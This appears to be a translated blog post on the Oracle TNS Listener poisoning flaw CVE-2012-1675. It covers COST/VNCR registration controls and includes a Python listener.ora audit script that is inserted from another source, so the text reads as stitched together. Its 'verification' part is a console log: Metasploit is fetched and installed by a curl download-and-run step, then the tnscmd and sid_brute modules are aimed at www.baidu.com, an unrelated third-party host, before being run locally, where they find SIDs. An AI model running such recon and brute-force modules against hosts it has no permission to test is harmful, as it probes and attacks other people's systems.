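Oracle TNS Listener Remote Poisoning Test

Published: 2020-06-11 16:31:58  Source: Internet  Views: 1508  Author: xingzhehxiang  Category: Relational Databases
  1. Remote data poisoning vulnerability (CVE-2012-1675)
    A vulnerability that lets an attacker, without supplying a username/password, poison the data handled by the remote "TNS Listener" component.
    COST is short for Class of Secure Transports. It is a security control mechanism for instance registration: for a given listener, it restricts which instances may register and over which protocols. This prevents other remote instances from registering maliciously and the risks that follow, such as information disclosure.
    It works by setting the parameter SECURE_REGISTER_listener_name in listener.ora to a transport list (the restricted list of registration protocols, such as IPC, TCP, TCPS). The feature is supported from version 10.2.0.3 onward (although the 10g R2 online documentation does not state this explicitly) and remains available in 11.2.0.4 and later. After 11.2.0.4, however, Oracle recommends using the default VNCR configuration.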
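
A defensive check for the setting described above, added here as an example (it is not code from the original post or from Oracle): it parses a listener.ora and reports, per listener, whether COST (SECURE_REGISTER_listener_name) or VNCR (Valid Node Checking for Registration, set with the Oracle Net parameter VALID_NODE_CHECKING_REGISTRATION_listener_name) restricts instance registration. The sample file, the host name db01 and the functions top_level_params and audit are constructed for illustration; an unset VNCR is counted as unrestricted, which is an assumption because the file alone does not reveal the release default.

```python
import re

# Constructed sample (not from the page): LISTENER uses COST, LISTENER_APP does not.
SAMPLE = """\
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = db01)(PORT = 1521))
      (ADDRESS = (PROTOCOL = IPC)(KEY = REGISTER))
    )
  )
SECURE_REGISTER_LISTENER = (IPC)   # registration accepted over local IPC only
LISTENER_APP =
  (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = db01)(PORT = 1522)))
VALID_NODE_CHECKING_REGISTRATION_LISTENER_APP = OFF
"""

def top_level_params(text):
    """Return {NAME: value} for every assignment made at parenthesis depth 0."""
    params, name, buf, depth = {}, None, [], 0
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()       # drop comments
        if not line.strip():
            continue
        m = re.match(r"([A-Za-z_][\w.]*)\s*=\s*(.*)$", line) if depth == 0 else None
        if m:                                       # a new top-level parameter starts
            if name:
                params[name] = " ".join(buf)
            name, buf = m.group(1).upper(), [m.group(2)]
        elif name:                                  # continuation of the current value
            buf.append(line.strip())
        depth += line.count("(") - line.count(")")
    if name:
        params[name] = " ".join(buf)
    return params

def audit(text):
    """Per listener: COST transports, VNCR value, whether registration is restricted."""
    p, report = top_level_params(text), {}
    for name, value in p.items():
        if name.startswith("SID_LIST_") or "ADDRESS" not in value.upper():
            continue                                # not a listener endpoint definition
        cost = [t.upper() for t in re.findall(r"\w+", p.get("SECURE_REGISTER_" + name, ""))]
        vncr = p.get("VALID_NODE_CHECKING_REGISTRATION_" + name, "").strip().upper() or None
        # Assumption: unset VNCR counts as unrestricted (release default unknown here).
        # A COST list that still contains plain TCP is treated as no restriction.
        restricted = (bool(cost) and "TCP" not in cost) or vncr not in (None, "OFF", "0")
        report[name] = {"cost": cost, "vncr": vncr, "restricted": restricted}
    return report
```

Run audit() on the contents of each listener.ora; a listener reported with restricted False has neither a COST transport list nor an enabled VNCR setting in that file.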

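  2. Impact
    The main impact is that an attacker can create a database with the same name as the current production database and register it with the production database's listener.
    User connections are then routed to the instance the attacker created, interrupting the application's service.
    The application reports ORA-12545: Connect failed because target host or object does not exist
  3. Affected versions
    Although the security alert describes the issue as starting with 10203, it actually affects any version from 8i onward.
  4. My verification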

[root@204_maridb ~]# curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5532 100 5532 0 0 6758 0 --:--:-- --:--:-- --:--:-- 6754
Checking for and installing update..
Adding metasploit-framework to your repository list..已加载插件:fastestmirror
Repository base is listed more than once in the configuration
Repository updates is listed more than once in the configuration
Repository extras is listed more than once in the configuration
Repository centosplus is listed more than once in the configuration
metasploit | 2.9 kB 00:00:00
metasploit/primary_db | 9.8 kB 00:00:00
Loading mirror speeds from cached hostfile

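 * epel: mirrors.tuna.tsinghua.edu.cn
正在解决依赖关系
--> 正在检查事务
---> 软件包 metasploit-framework.x86_64.0.5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6 将被 安装
--> 解决依赖关系完成

依赖关系解决

========================================================================================================================================================================================================
 Package 架构 版本 源 大小
========================================================================================================================================================================================================
正在安装:
 metasploit-framework x86_64 5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6 metasploit 195 M

事务概要
========================================================================================================================================================================================================
安装 1 软件包

总下载量:195 M
安装大小:433 M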
Downloading packages:
警告:/var/cache/yum/x86_64/7/metasploit/packages/metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm: 头V4 RSA/SHA256 Signature, 密钥 ID 2007b954: NOKEYMB 00:00:00 ETA
metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm 的公钥尚未安装
metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm | 195 MB 00:05:07
从 file:///etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit 检索密钥
导入 GPG key 0x2007B954:
 用户ID : "Metasploit <metasploit@rapid7.com>"
 指纹 : 09e5 5faf 4f78 62cd 6d55 8997 cdfb 5fa5 2007 b954
 来自 : /etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  正在安装 : metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64 1/1
Run msfconsole to get started
  验证中 : metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64 1/1

已安装:
  metasploit-framework.x86_64 0:5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6

完毕!
[root@204_maridb ~]# ms
msfbinscan msfd msfelfscan msfpescan msfrpc msfupdate msgattrib msgcmp msgconv msgexec msgfmt msghack msgmerge msguniq
msfconsole msfdb msfmachscan msfrop msfrpcd msfvenom msgcat msgcomm msgen msgfilter msggrep msginit msgunfmt msql2mysql
[root@204_maridb ~]# msfconsole
-bash: /usr/local/bin/msfconsole: 没有那个文件或目录
[root@204_maridb ~]# which msfconsole
/usr/bin/msfconsole
[root@204_maridb ~]# /usr/bin/msfconsole
[-] *rting the Metasploit Framework console...|
[-] WARNING: No database support: No database YAML file
[-]


       =[ metasploit v5.0.19-dev-                         ]
+ -- --=[ 1880 exploits - 1062 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > use auxiliary/admin/oracle/tnscmd
msf5 auxiliary(admin/oracle/tnscmd) > info

       Name: Oracle TNS Listener Command Issuer
     Module: auxiliary/admin/oracle/tnscmd
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2009-02-01

Provided by:
  MC <mc@metasploit.com>

Check supported:
  No

Basic options:
   Name    Current Setting                   Required  Description
   ----    ---------------                   --------  -----------
   CMD     (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..
   RHOSTS                                    yes       The target address range or CIDR identifier
   RPORT   1521                              yes       The target port (TCP)

Description:
This module allows for the sending of arbitrary TNS commands in
order to gather information. Inspired from tnscmd.pl from
www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd

msf5 auxiliary(admin/oracle/tnscmd) > set RHOST www.xxxx.cc
RHOST => www.xxxx.cc
msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

   Name    Current Setting                   Required  Description
   ----    ---------------                   --------  -----------
   CMD     (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..
   RHOSTS  www.xxxx.cc                       yes       The target address range or CIDR identifier
   RPORT   1521                              yes       The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > run
[-] Auxiliary failed: option RHOSTS failed to validate.
msf5 auxiliary(admin/oracle/tnscmd) > set RHOST www.baidu.com
RHOST => www.baidu.com
msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

   Name    Current Setting                   Required  Description
   ----    ---------------                   --------  -----------
   CMD     (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..
   RHOSTS  www.baidu.com                     yes       The target address range or CIDR identifier
   RPORT   1521                              yes       The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > run
[*] Running module against 61.135.169.125
[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[*] Running module against 61.135.169.121
[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/tnscmd) > use auxiliary/admin/oracle/sid_brute
msf5 auxiliary(admin/oracle/sid_brute) > show options

Module options (auxiliary/admin/oracle/sid_brute):

   Name     Current Setting                                                      Required  Description
   ----     ---------------                                                      --------  -----------
   RHOSTS                                                                        yes       The target address range or CIDR identifier
   RPORT    1521                                                                 yes       The target port (TCP)
   SIDFILE  /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt  no        The file that contains a list of sids.
   SLEEP    1                                                                    no        Sleep() amount between each request.

msf5 auxiliary(admin/oracle/sid_brute) > set RHOST www.baidu.com
RHOST => www.baidu.com
msf5 auxiliary(admin/oracle/sid_brute) > show options

Module options (auxiliary/admin/oracle/sid_brute):

   Name     Current Setting                                                      Required  Description
   ----     ---------------                                                      --------  -----------
   RHOSTS   www.baidu.com                                                        yes       The target address range or CIDR identifier
   RPORT    1521                                                                 yes       The target port (TCP)
   SIDFILE  /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt  no        The file that contains a list of sids.
   SLEEP    1                                                                    no        Sleep() amount between each request.

msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 61.135.169.121
[*] www.baidu.com:1521 - Starting brute force on www.baidu.com, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[*] Running module against 61.135.169.125
[*] www.baidu.com:1521 - Starting brute force on www.baidu.com, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'PLSExtProc'
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[*] 127.0.0.1:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'PLSExtProc'
[-] 127.0.0.1:1521 - The connection was refused by the remote host (127.0.0.1:1521).
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'PLSExtProc'
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[*] 127.0.0.1:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) >
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[*] 127.0.0.1:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[*] 127.0.0.1:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > exit
[root@204_maridb ~]# /usr/bin/msfconsole
[-] *rting the Metasploit Framework console...|
[-] WARNING: No database support: No database YAML file
[-]


       =[ metasploit v5.0.19-dev-                         ]
+ -- --=[ 1880 exploits - 1062 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > use auxiliary/admin/oracle/tnscmd
msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

   Name    Current Setting                   Required  Description
   ----    ---------------                   --------  -----------
   CMD     (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..
   RHOSTS                                    yes       The target address range or CIDR identifier
   RPORT   1521                              yes       The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > use auxiliary/admin/oracle/sid_brute
msf5 auxiliary(admin/oracle/sid_brute) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[*] 127.0.0.1:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) >
